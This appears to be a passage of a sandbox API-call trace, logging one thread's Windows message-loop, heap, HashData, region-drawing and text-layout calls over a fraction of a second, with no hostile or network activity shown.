[0168.416] GetCurrentThreadId () returned 0xb48 [0168.416] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.416] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.416] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.417] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0168.417] IsIconic (hWnd=0x103e0) returned 0 [0168.417] GetCurrentThreadId () returned 0xb48 [0168.417] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.417] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.417] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.417] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0168.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.418] GetCurrentThreadId () returned 0xb48 [0168.418] GetCurrentThreadId () returned 0xb48 [0168.418] GetFocus () returned 0x0 [0168.418] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0168.419] GetCurrentThreadId () returned 0xb48 [0168.419] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098723821279) returned 1 [0168.419] GetCurrentThreadId () returned 0xb48 [0168.419] GetCurrentThreadId () returned 0xb48 [0168.420] GetCurrentThreadId () returned 0xb48 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3098723888502) returned 1 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3098723895728) returned 1 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3098723908338) returned 1 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3098723914797) returned 1 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3098723921413) returned 1 [0168.420] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3098723948814) returned 1 [0168.421] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3098723958195) returned 1 [0168.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.421] SetEvent (hEvent=0x304) returned 1 [0168.421] WTSGetActiveConsoleSessionId () returned 0x1 [0168.421] GetCurrentProcessId () returned 0xe14 [0168.421] GetCurrentThreadId () returned 0xb48 [0168.421] SetEvent (hEvent=0x668) returned 1 [0168.422] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0168.422] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.423] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.423] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.423] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.423] KillTimer (hWnd=0x30316, uIDEvent=0x2013) returned 1 [0168.423] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.448] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.448] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.448] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.448] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.448] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0168.449] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098726759531) returned 1 [0168.449] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0168.449] NtdllDefWindowProc_W () returned 0x0 [0168.449] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.450] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.450] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.450] KillTimer (hWnd=0x30316, uIDEvent=0x2016) returned 1 [0168.450] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098726908215) returned 1 [0168.450] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.450] GetFocus () returned 0x0 [0168.450] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a147) returned 0 [0168.451] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.451] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcc24 | out: lpRect=0xcfcc24) returned 1 [0168.451] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.451] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098727002307) returned 1 [0168.451] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0xb010541 [0168.451] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x13040a78 [0168.451] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0168.451] GetRandomRgn (hdc=0xb010541, hrgn=0x13040a78, i=4) returned 1 [0168.451] OffsetRgn (hrgn=0x13040a78, x=-507, y=-333) returned 2 [0168.451] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0168.451] GetRegionData (in: hrgn=0x13040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0168.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c2d8 [0168.452] GetRegionData (in: hrgn=0x13040a78, nCount=0x30, lpRgnData=0x9f6c2d8 | out: lpRgnData=0x9f6c2d8) returned 0x30 [0168.452] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.452] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c2d8 | out: hHeap=0x5e0000) returned 1 [0168.452] DeleteObject (ho=0x13040a78) returned 1 [0168.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c150 [0168.452] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c150) returned 0x8e040a6c [0168.452] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c150 | out: hHeap=0x5e0000) returned 1 [0168.452] SelectClipRgn (hdc=0xb010541, hrgn=0x8e040a6c) returned 2 [0168.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c498 [0168.452] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c498) returned 0x25040a81 [0168.452] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c498 | out: hHeap=0x5e0000) returned 1 [0168.452] ValidateRgn (hWnd=0x103e2, hRgn=0x25040a81) returned 1 [0168.452] DeleteObject (ho=0x8e040a6c) returned 1 [0168.452] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.453] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0168.454] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68be38 [0168.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.454] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.454] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.454] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.454] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0168.455] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.455] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.455] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.455] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0168.455] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0168.455] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.455] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.455] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.455] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0168.455] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0168.455] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.455] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.455] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.455] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0168.455] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.456] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83058 [0168.456] HashData (in: pbData=0x9f83058, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.456] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.456] HashData (in: pbData=0x9f8305c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.456] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83058 | out: hHeap=0x5e0000) returned 1 [0168.456] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0168.456] HashData (in: pbData=0x9f82ef0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.456] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.456] HashData (in: pbData=0x9f82ef4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.456] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0168.456] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f80 [0168.456] HashData (in: pbData=0x9f82f80, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.456] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.456] HashData (in: pbData=0x9f82f84, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.457] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f80 | out: hHeap=0x5e0000) returned 1 [0168.457] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.457] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.457] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.457] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.457] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.457] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.457] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.457] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.457] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.457] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.457] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0168.457] HashData (in: pbData=0x9f82fb0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.457] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.506] HashData (in: pbData=0x9f82fb4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.506] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0168.506] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.507] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.507] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.507] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.507] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.507] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.507] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0168.507] HashData (in: pbData=0x9f82f68, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.507] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.507] HashData (in: pbData=0x9f82f6c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.507] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0168.507] LsSetDoc () returned 0x0 [0168.508] LsCreateLine () returned 0x0 [0168.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.508] LsdnFinishRegular () returned 0x0 [0168.513] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.513] LsdnFinishRegular () returned 0x0 [0168.514] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.514] LsDisplayLine () returned 0x0 [0168.514] IOleInPlaceFrame:SetMenu (This=0xd90a00, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0168.514] IOleInPlaceFrame:SetMenu (This=0xd909e0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0168.514] GetSysColor (nIndex=8) returned 0x0 [0168.514] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.514] GetSysColor (nIndex=8) returned 0x0 [0168.514] LsDestroyLine () returned 0x0 [0168.515] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0168.515] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b00 [0168.515] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0168.515] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0168.515] HashData (in: pbData=0x9f83014, cbData=0x4, pbHash=0x9f83018, cbHash=0x2 | out: pbHash=0x9f83018) returned 0x0 [0168.515] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.515] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.516] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.516] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0168.516] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0168.516] HashData (in: pbData=0x9ee6b00, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.516] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.516] HashData (in: pbData=0x9ee6b04, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.516] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b00 | out: hHeap=0x5e0000) returned 1 [0168.516] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b90 [0168.516] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0168.516] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0168.517] HashData (in: pbData=0x9f830bc, cbData=0x4, pbHash=0x9f830c0, cbHash=0x2 | out: pbHash=0x9f830c0) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.517] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.517] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0168.518] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0168.518] HashData (in: pbData=0x9ee6b90, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.518] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.518] HashData (in: pbData=0x9ee6b94, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.518] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b90 | out: hHeap=0x5e0000) returned 1 [0168.518] GetFocus () returned 0x0 [0168.518] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19795f) returned 0 [0168.518] GetFocus () returned 0x0 [0168.518] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19796b) returned 0 [0168.519] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.519] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0168.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0168.520] _CIsqrt () returned 0x407b027f [0168.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a30 [0168.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.520] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a30 | out: hHeap=0x5e0000) returned 1 [0168.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddd78 [0168.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.520] HashData (in: pbData=0xd94e40, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0168.627] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddd78 | out: hHeap=0x5e0000) returned 1 [0168.627] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6bd0 [0168.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0168.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0168.628] HashData (in: pbData=0x9f82f6c, cbData=0x4, pbHash=0x9f82f70, cbHash=0x2 | out: pbHash=0x9f82f70) returned 0x0 [0168.628] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.628] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.628] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.629] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.629] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 